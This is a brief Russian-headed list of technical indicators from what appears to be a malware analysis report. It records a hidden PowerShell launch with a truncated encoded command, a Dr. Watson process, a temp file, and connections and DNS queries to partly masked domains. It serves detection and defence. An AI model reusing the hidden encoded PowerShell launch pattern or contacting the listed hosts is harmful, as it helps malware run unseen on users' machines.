Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABPAGoAcABjAGsAdwB4AGgAYQBvAGoAZABlAD0AJwBLAHQAdwBmAGIAcwBsAG8AJwA7ACQAUQBnAG0AegBsAHIAagBjAGUAcgAgAD0AIAAnADkANgAzACcAOwAkAEkAeABzAHQAZwB4AGkAZgA9ACcARQB2AHM...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1596
- %TEMP%\1367863.cvr
- 'sh##.#altdogs.com':80
- 'sh##.#altdogs.com':443
- 'sp#######ordsforchildren.com':443
- 'gr#####cleanteam.com':443
- http://sh##.#altdogs.com/ff0lb/cache/hzvv-esr-01265/
- 'sh##.#altdogs.com':443
- 'sp#######ordsforchildren.com':443
- 'gr#####cleanteam.com':443
- DNS ASK ro####perties.com
- DNS ASK sh##.#altdogs.com
- DNS ASK sp#######ordsforchildren.com
- DNS ASK gr#####cleanteam.com
- DNS ASK ro######eigninvestments.com